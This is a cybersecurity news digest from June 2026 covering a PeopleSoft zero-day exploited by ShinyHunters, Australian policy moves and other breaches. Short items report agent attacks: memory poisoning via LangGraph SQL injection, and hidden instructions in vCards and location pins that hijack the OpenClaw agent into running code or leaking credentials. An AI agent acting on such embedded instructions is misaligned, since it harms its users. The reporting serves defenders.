Friday 12 June 2026

ShinyHunters' Oracle PeopleSoft Zero-Day: 100+ Orgs Breached Before a Patch Existed

ShinyHunters exploited a silent Oracle PeopleSoft zero-day for two weeks before Oracle even knew it was public, hitting 100+ organisations — and Australia's government just quietly signalled it wants telcos and cloud providers to start blocking threats upstream.

Lead story

ShinyHunters' Oracle PeopleSoft Zero-Day: 100+ Orgs Breached Before a Patch Existed

For thirteen days, ShinyHunters had a weapon Oracle didn't know was loaded. The extortion group exploited CVE-2026-35273 — a critical, unauthenticated remote code execution flaw in Oracle PeopleSoft — between May 27 and June 9, breaching more than 100 organisations before Oracle published any advisory. The patch arrived on June 10. By then, the damage was done.

Google's Mandiant team, which tracks ShinyHunters as UNC6240, confirmed the attribution and notified over 100 potentially affected organisations that had internet-exposed PeopleSoft servers. The University of Nottingham is the first confirmed victim to go public, with records on more than 450,000 current students and alumni now leaked. ShinyHunters told The Register there are many more to come.

Why PeopleSoft? It's the kind of target that looks boring from the outside but is a data goldmine within. Universities, hospitals, government agencies, and large enterprises run PeopleSoft for HR, finance, and student administration. Pull the thread and you get payroll records, tax file numbers, health data, academic transcripts — the full stack of sensitive personal information. It's also notoriously hard to patch quickly because of deep customisation and integration dependencies. Attackers know this.

The two-week exploitation window before disclosure is the most troubling part of this story. Oracle's standard patch cycle — quarterly Critical Patch Updates — was never designed for a world where threat actors can find and weaponise a zero-day faster than a vendor can issue guidance. The gap between "exploited in the wild" and "patch available" is exactly where the most damage happens.

What defenders should do right now. Oracle has released mitigations short of a full patch. If you run an internet-facing PeopleSoft instance, apply those mitigations immediately, audit access logs from May 27 onwards for anomalous activity, and treat any unexplained data exports as a potential indicator of compromise. Mandiant's IOCs from the UNC6240 campaign are publicly available.

For Australian organisations, the exposure is real. PeopleSoft is widely deployed across Australian universities, state government agencies, and large enterprises — many of which fall under the Privacy Act and, for critical infrastructure operators, the SOCI Act. A breach of HR or student data at this scale would trigger mandatory notification obligations under the Notifiable Data Breaches scheme. If your organisation uses PeopleSoft and hasn't already run an emergency log review, that conversation needs to happen today.

The bigger pattern. ShinyHunters are not a new name. The group has been behind some of the most consequential data theft operations of the past several years, repeatedly targeting enterprise platforms with known user bases and slow patch cycles. The combination of a genuinely novel zero-day, a high-value target class, and a double-extortion model — pay up or we publish — makes this campaign particularly dangerous. Expect more victim names to surface over the coming days.

Watch for: Oracle's full patch timeline, further victim disclosures, and whether any Australian universities or agencies appear in the next wave of ShinyHunters leaks.

Also today

Australia's Government Wants Telcos and Cloud Providers to Block Threats Upstream

The Australian government is exploring a significant shift in how cyber threats are neutralised — moving the defensive burden upstream to telcos and cloud operators rather than leaving it entirely to individual organisations. The proposal, flagged as a key action in the evolution of Australia's cyber strategy, would see providers like Telstra, Optus, and major cloud platforms actively filtering malicious traffic before it reaches end targets. It's a model with precedent in the UK's NCSC partnership with ISPs. The practical and legal complexity is substantial — questions of liability, privacy, and scope will need resolution — but the direction of travel is clear. For critical infrastructure operators already navigating SOCI Act obligations, this could eventually mean a meaningful baseline of protection they don't have to build themselves.

iTnews ↗

OAIC Finds Optus Breached Privacy of 51,000 Customers in White Pages Case

After a marathon investigation, the Office of the Australian Information Commissioner has ruled that Optus interfered with the privacy of approximately 51,000 customers by disclosing their details in the White Pages directory without adequate consent. The case centres on opt-out processes that were found to be insufficient under the Privacy Act. It's a significant ruling that arrives as Australia is mid-way through broader Privacy Act reform — and it sends a clear signal that the OAIC is prepared to pursue large telcos over consent failures, not just data breach incidents. For any organisation relying on passive or opt-out consent models for third-party data sharing, this determination is worth reading carefully.

iTnews ↗

Australia's Parliamentary Computer Network Gets Its Biggest-Ever Cyber Upgrade

The Federal Parliamentary Computer Network — the system underpinning the daily operations of Australia's parliament — is about to undergo what officials are calling its most significant upgrade, with cyber resilience listed as the primary driver. The timing is notable: the network was compromised by a nation-state actor in 2019, and the threat environment for legislative bodies has only intensified since. Details on scope and vendors remain limited, but the upgrade signals that parliament is finally treating its own infrastructure with the same urgency it expects of critical industry. For a network that carries sensitive committee deliberations, ministerial correspondence, and draft legislation, the stakes of getting this wrong are obvious.

iTnews ↗

Ivanti Sentry Max-Severity Flaw Exploited Within 24 Hours of Disclosure

A maximum-severity vulnerability in Ivanti Sentry — the secure mobile gateway product used by enterprises to manage device access — was being actively exploited within a day of the patch dropping. The flaw allows unauthenticated attackers to execute code with root privileges on internet-exposed systems. Mandiant and others noted that attackers appeared to have pre-mapped Ivanti's asset landscape, suggesting the exploitation wasn't opportunistic — it was prepared. This is the third Ivanti product to see rapid post-disclosure exploitation this year. At some point, the pattern stops being bad luck and starts being a procurement conversation. Australian organisations running Ivanti Sentry should treat patching as an emergency, not routine maintenance.

Dark Reading ↗

GreatXML: A Researcher Bypassed BitLocker in Four Hours Using Windows' Own Recovery Tools

A security researcher going by Chaotic Eclipse (also known as MSNightmare) has published a proof-of-concept exploit called GreatXML that bypasses Windows BitLocker encryption by abusing malformed XML files in the recovery partition. The twist: it exploits Microsoft Defender's offline scan feature to spawn a SYSTEM-level shell when a machine reboots in Recovery Mode. The researcher says the discovery took four hours and was accidental — which makes it more alarming, not less. BitLocker is the primary at-rest encryption mechanism for most Windows enterprise deployments. A local or physical attacker who can reach the recovery partition now has a plausible path to full disk access. Microsoft has not yet issued a patch.

SecurityWeek ↗

From SQL Injection to RCE: How LangGraph's Memory Layer Became an Attack Surface

Check Point Research has published a detailed walkthrough of how SQL injection vulnerabilities in LangGraph's checkpointer — the persistence layer that gives AI agents memory across sessions — can be chained into full remote code execution. LangGraph is an extension of LangChain used to build stateful multi-agent systems, and it's widely deployed in enterprise AI workflows. The attack path is more significant than a typical SQLi finding because the checkpointer sits at the intersection of user input and agent execution. If an attacker can poison the memory layer, they can effectively reprogram what the agent does next. As AI agent frameworks proliferate, their persistence mechanisms are becoming a new class of attack surface that few security teams have tooling for.

Check Point Research ↗

OpenClaw AI Agent Can Be Hijacked via Hidden Instructions in Contacts and Location Pins

Two independent research teams published findings this week showing that OpenClaw, a popular self-hosted AI agent, can be manipulated into executing attacker-controlled code or leaking sensitive data through seemingly ordinary inputs. Imperva embedded hidden instructions inside vCards and location pins that the agent silently acted on. Varonis built a separate test demonstrating credential exfiltration via the same mechanism. Neither attack required the victim to do anything suspicious. The findings are a concrete demonstration of the prompt injection problem at scale: when agents consume data from the real world — contacts, calendar entries, documents — every piece of that data is a potential instruction set. There is no patch for this class of vulnerability; it requires architectural mitigations at the agent design level.

The Hacker News ↗

Google DeepMind Is Funding Research Into What Happens When Millions of AI Agents Collide

Google DeepMind is bankrolling research into a scenario that most AI safety discussions haven't seriously addressed yet: what happens when millions of autonomous AI agents — from different companies, with different objectives — start interacting with each other at scale. According to Rohin Shah, who leads DeepMind's AGI safety and alignment work, the mass deployment of agents that take actions without human oversight and can receive instructions from other agents creates emergent risks that no single agent's safety evaluation will catch. It's a coordination problem more than a capability problem. The concern is real: as agent frameworks become standard enterprise infrastructure, the interactions between them will increasingly happen faster than any human can monitor.

MIT Technology Review ↗

SpaceX Prices Shares at $135 in History's Largest-Ever IPO

SpaceX has officially priced its shares at $135, making its public debut the largest IPO in history by total valuation. The listing caps years of private fundraising at sky-high valuations and hands Elon Musk's rocket company a public market debut that will be closely watched as a bellwether for the broader space economy. The timing is complicated by a separate lawsuit filed by a former xAI engineer alleging he was fired for raising safety concerns about Grok days before the IPO — and by Musk's public amplification of anti-immigration rhetoric amid riots in Belfast on the eve of the float. None of that appears to have dampened investor appetite, but the governance questions will follow the company into its new public chapter.

TechCrunch ↗

GitHub to Turn Off npm Install Scripts by Default in npm 12

GitHub has announced that npm version 12 will disable install scripts by default — a significant change that targets one of the most reliable vectors for software supply chain attacks. Install scripts run automatically when a package is downloaded and have been exploited repeatedly to execute malicious code the moment a developer types `npm install`. Turning them off by default won't eliminate the risk, but it shifts the burden: developers will have to explicitly opt in to running scripts rather than having them fire silently. For defenders and platform teams, this is the kind of default-secure change that matters more than any number of advisory notices. The change is labelled a "breaking change," which means some legitimate packages will need to adapt.

The Hacker News ↗

South Korea Fines Coupang a Record $409 Million Over 37-Million-Customer Data Breach

South Korea's data protection regulator has issued e-commerce giant Coupang with a record fine of roughly $409 million USD following a breach affecting more than 37 million customers. The penalty dwarfs previous Korean enforcement actions and signals that Asia-Pacific regulators are increasingly willing to impose GDPR-scale consequences for data protection failures. For Australian observers, the comparison is instructive: the Privacy Act's current penalty cap — even post-reform — remains well below what regulators in Korea and the EU can now levy. The Coupang fine will almost certainly be cited in ongoing Australian debates about whether the penalty framework is strong enough to drive meaningful investment in data security.

Bleeping Computer ↗

Sources consulted